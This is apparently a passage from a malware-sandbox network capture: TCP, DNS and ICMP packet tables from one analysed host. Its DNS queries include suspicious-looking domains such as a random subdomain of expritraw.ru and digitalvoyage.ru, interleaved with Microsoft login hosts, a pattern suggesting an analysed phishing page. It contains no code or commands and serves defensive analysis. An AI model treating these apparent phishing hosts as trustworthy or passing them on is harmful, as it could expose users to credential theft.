                                                                                  Jan 7, 2025 19:49:19.980828047 CET49860443192.168.2.6104.18.94.41
                                                                                  Jan 7, 2025 19:49:19.980839968 CET44349860104.18.94.41192.168.2.6
                                                                                  Jan 7, 2025 19:49:20.357078075 CET44349867188.114.96.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:20.357369900 CET49867443192.168.2.6188.114.96.3
                                                                                  Jan 7, 2025 19:49:20.357384920 CET44349867188.114.96.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:20.358453989 CET44349867188.114.96.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:20.358517885 CET49867443192.168.2.6188.114.96.3
                                                                                  Jan 7, 2025 19:49:20.359605074 CET49867443192.168.2.6188.114.96.3
                                                                                  Jan 7, 2025 19:49:20.359666109 CET44349867188.114.96.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:20.359879017 CET49867443192.168.2.6188.114.96.3
                                                                                  Jan 7, 2025 19:49:20.359885931 CET44349867188.114.96.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:20.406944990 CET49867443192.168.2.6188.114.96.3
                                                                                  Jan 7, 2025 19:49:20.899302959 CET44349867188.114.96.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:20.899425983 CET44349867188.114.96.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:20.899499893 CET49867443192.168.2.6188.114.96.3
                                                                                  Jan 7, 2025 19:49:20.900840998 CET49867443192.168.2.6188.114.96.3
                                                                                  Jan 7, 2025 19:49:20.900852919 CET44349867188.114.96.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:21.071252108 CET49875443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.071297884 CET44349875188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:21.071357012 CET49875443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.071691036 CET49875443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.071701050 CET44349875188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:21.579503059 CET44349875188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:21.580166101 CET49875443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.580179930 CET44349875188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:21.581206083 CET44349875188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:21.581271887 CET49875443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.581675053 CET49875443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.581686974 CET49875443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.581734896 CET44349875188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:21.581743956 CET49875443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.581779957 CET49875443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.582109928 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.582135916 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:21.582196951 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.582417965 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:21.582429886 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:22.048465014 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:22.048696041 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:22.048710108 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:22.049709082 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:22.049782038 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:22.050127029 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:22.050189972 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:22.050321102 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:22.050332069 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:22.097183943 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:22.662954092 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:22.663058996 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:22.663228989 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:22.663903952 CET49881443192.168.2.6188.114.97.3
                                                                                  Jan 7, 2025 19:49:22.663922071 CET44349881188.114.97.3192.168.2.6
                                                                                  Jan 7, 2025 19:49:25.088076115 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:25.088100910 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:25.088324070 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:25.088869095 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:25.088887930 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:25.920150995 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:25.920286894 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:25.926040888 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:25.926048994 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:25.926299095 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:25.931395054 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:25.931467056 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:25.931473017 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:25.931612015 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:25.975331068 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:26.113595963 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:26.113722086 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:26.113780975 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:26.114099026 CET49909443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:49:26.114104033 CET4434990940.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:49:55.265984058 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:55.266019106 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:49:55.266093016 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:55.266697884 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:55.266711950 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:49:56.055243969 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:49:56.055324078 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:56.057559967 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:56.057573080 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:49:56.057816029 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:49:56.059705973 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:56.059762955 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:56.059767008 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:49:56.059900999 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:56.103338003 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:49:56.229687929 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:49:56.229890108 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:49:56.229995012 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:56.230104923 CET50085443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:49:56.230118990 CET4435008540.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:02.189707994 CET50087443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:50:02.189735889 CET44350087142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:50:02.189826965 CET50087443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:50:02.190176964 CET50087443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:50:02.190191031 CET44350087142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:50:02.818002939 CET44350087142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:50:02.818634987 CET50087443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:50:02.818646908 CET44350087142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:50:02.818967104 CET44350087142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:50:02.819272995 CET50087443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:50:02.819345951 CET44350087142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:50:02.860019922 CET50087443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:50:12.744090080 CET44350087142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:50:12.744163036 CET44350087142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:50:12.744213104 CET50087443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:50:14.376880884 CET50087443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:50:14.376899004 CET44350087142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:50:28.853416920 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:28.853447914 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:28.853522062 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:28.854119062 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:28.854135036 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:29.668271065 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:29.668345928 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:29.670530081 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:29.670540094 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:29.670773029 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:29.673116922 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:29.673182964 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:29.673187971 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:29.673316956 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:29.719330072 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:29.845931053 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:29.846158028 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:50:29.846210003 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:29.846349001 CET50092443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:50:29.846364021 CET4435009240.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:02.251595020 CET50095443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:51:02.251632929 CET44350095142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:51:02.251713991 CET50095443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:51:02.252000093 CET50095443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:51:02.252012968 CET44350095142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:51:02.948293924 CET44350095142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:51:02.948664904 CET50095443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:51:02.948694944 CET44350095142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:51:02.949019909 CET44350095142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:51:02.949337959 CET50095443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:51:02.949409008 CET44350095142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:51:03.000055075 CET50095443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:51:09.607368946 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:09.607419968 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:09.607532024 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:09.608141899 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:09.608156919 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:10.408111095 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:10.408266068 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:10.410319090 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:10.410329103 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:10.410533905 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:10.412679911 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:10.412739992 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:10.412744999 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:10.412906885 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:10.459337950 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:10.591372967 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:10.591527939 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:10.591634989 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:10.591923952 CET50096443192.168.2.640.113.110.67
                                                                                  Jan 7, 2025 19:51:10.591938019 CET4435009640.113.110.67192.168.2.6
                                                                                  Jan 7, 2025 19:51:12.859894037 CET44350095142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:51:12.859981060 CET44350095142.250.186.36192.168.2.6
                                                                                  Jan 7, 2025 19:51:12.860053062 CET50095443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:51:14.377330065 CET50095443192.168.2.6142.250.186.36
                                                                                  Jan 7, 2025 19:51:14.377371073 CET44350095142.250.186.36192.168.2.6
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 7, 2025 19:48:58.085690975 CET53554231.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.187772036 CET5807653192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:48:58.187772036 CET5782153192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:48:58.192533970 CET53569271.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.220829010 CET53580761.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.355931044 CET53578211.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.187663078 CET4988153192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:48:59.187803984 CET5270753192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:48:59.194576979 CET53498811.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.195117950 CET53527071.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.255234957 CET53548991.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.256184101 CET5982653192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:48:59.256429911 CET5994853192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:48:59.264790058 CET53599481.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.266968966 CET53598261.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.985234022 CET5508653192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:48:59.986169100 CET6308853192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:48:59.992007017 CET53550861.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.993099928 CET53630881.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.101176977 CET6256853192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:00.101622105 CET6086153192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:00.287393093 CET53608611.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.296613932 CET53625681.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.759484053 CET6084353192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:01.759629011 CET6061253192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:01.759998083 CET5576453192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:01.760138035 CET5799253192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:01.760598898 CET5040453192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:01.760747910 CET5980653192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:01.766294003 CET53608431.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.766935110 CET53557641.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.766946077 CET53579921.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.766963959 CET53606121.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.767334938 CET53598061.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.767344952 CET53504041.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:02.126554966 CET6069053192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:02.127011061 CET6493153192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:02.133348942 CET53606901.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:02.133924961 CET53649311.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:02.420582056 CET53534181.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:02.542113066 CET5918253192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:02.542256117 CET5921953192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:02.549072981 CET53591821.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:02.549180984 CET53592191.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:03.138636112 CET5476753192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:03.138786077 CET5433553192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:03.145767927 CET53543351.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:03.146123886 CET53547671.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:03.172804117 CET6065153192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:03.173295975 CET6410253192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:03.180180073 CET53606511.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:03.180804014 CET53641021.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:04.861821890 CET6118153192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:04.861978054 CET5521253192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:04.869146109 CET53611811.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:04.870431900 CET53552121.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:16.197087049 CET53621321.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:19.255630970 CET6093853192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:19.255866051 CET5470453192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:19.351447105 CET53609381.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:19.351813078 CET53547041.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:20.914518118 CET6293553192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:20.914655924 CET5067053192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:20.936127901 CET6120453192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:20.936269045 CET5096753192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:20.997411013 CET53509671.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:21.070576906 CET53612041.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:22.011665106 CET6395853192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:22.012111902 CET6305153192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:22.048763990 CET53630511.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:24.484776020 CET6080953192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:24.484941959 CET5410453192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:24.492274046 CET53541041.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:25.612415075 CET5480353192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:25.612562895 CET5811553192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:25.619103909 CET53548031.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:25.620245934 CET53581151.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:30.584151030 CET53625671.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:35.288566113 CET53549901.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:40.713010073 CET5737453192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:40.713186026 CET5243253192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:49:57.731945038 CET53525971.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:58.291858912 CET53493591.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:50:04.876759052 CET5580353192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:50:04.876905918 CET4937153192.168.2.61.1.1.1
                                                                                  Jan 7, 2025 19:50:27.915051937 CET53610841.1.1.1192.168.2.6
                                                                                  Jan 7, 2025 19:51:12.165498018 CET53549841.1.1.1192.168.2.6
                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                  Jan 7, 2025 19:48:56.762800932 CET192.168.2.61.1.1.1c229(Port unreachable)Destination Unreachable
                                                                                  Jan 7, 2025 19:48:58.356035948 CET192.168.2.61.1.1.1c22c(Port unreachable)Destination Unreachable
                                                                                  Jan 7, 2025 19:49:22.048849106 CET192.168.2.61.1.1.1c26d(Port unreachable)Destination Unreachable
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Jan 7, 2025 19:48:58.187772036 CET192.168.2.61.1.1.10x429eStandard query (0)futureslocal.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:58.187772036 CET192.168.2.61.1.1.10x400aStandard query (0)futureslocal.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.187663078 CET192.168.2.61.1.1.10x634fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.187803984 CET192.168.2.61.1.1.10x9650Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.256184101 CET192.168.2.61.1.1.10x29cfStandard query (0)futureslocal.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.256429911 CET192.168.2.61.1.1.10xec92Standard query (0)futureslocal.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.985234022 CET192.168.2.61.1.1.10xc54dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.986169100 CET192.168.2.61.1.1.10x9e32Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.101176977 CET192.168.2.61.1.1.10x76c7Standard query (0)7x8x.digitalvoyage.ruA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.101622105 CET192.168.2.61.1.1.10x8a6aStandard query (0)7x8x.digitalvoyage.ru65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.759484053 CET192.168.2.61.1.1.10x1cd5Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.759629011 CET192.168.2.61.1.1.10xb51bStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.759998083 CET192.168.2.61.1.1.10x53d3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.760138035 CET192.168.2.61.1.1.10x881bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.760598898 CET192.168.2.61.1.1.10xb9fcStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.760747910 CET192.168.2.61.1.1.10xeaf1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.126554966 CET192.168.2.61.1.1.10xb743Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.127011061 CET192.168.2.61.1.1.10x3b44Standard query (0)www.google.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.542113066 CET192.168.2.61.1.1.10xc0e6Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.542256117 CET192.168.2.61.1.1.10x45abStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.138636112 CET192.168.2.61.1.1.10x1e69Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.138786077 CET192.168.2.61.1.1.10x819Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.172804117 CET192.168.2.61.1.1.10xd058Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.173295975 CET192.168.2.61.1.1.10x11c9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:04.861821890 CET192.168.2.61.1.1.10xc921Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:04.861978054 CET192.168.2.61.1.1.10x236bStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:19.255630970 CET192.168.2.61.1.1.10x18c0Standard query (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ruA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:19.255866051 CET192.168.2.61.1.1.10xb7f8Standard query (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:20.914518118 CET192.168.2.61.1.1.10xb5f2Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:20.914655924 CET192.168.2.61.1.1.10x7092Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:20.936127901 CET192.168.2.61.1.1.10x6287Standard query (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ruA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:20.936269045 CET192.168.2.61.1.1.10xb174Standard query (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:22.011665106 CET192.168.2.61.1.1.10xd8bdStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:22.012111902 CET192.168.2.61.1.1.10xe9ccStandard query (0)www.office.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:24.484776020 CET192.168.2.61.1.1.10xe97dStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:24.484941959 CET192.168.2.61.1.1.10xf2cStandard query (0)www.office.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:25.612415075 CET192.168.2.61.1.1.10x5216Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:25.612562895 CET192.168.2.61.1.1.10xd414Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:40.713010073 CET192.168.2.61.1.1.10xd680Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:40.713186026 CET192.168.2.61.1.1.10x179eStandard query (0)login.microsoftonline.com65IN (0x0001)false
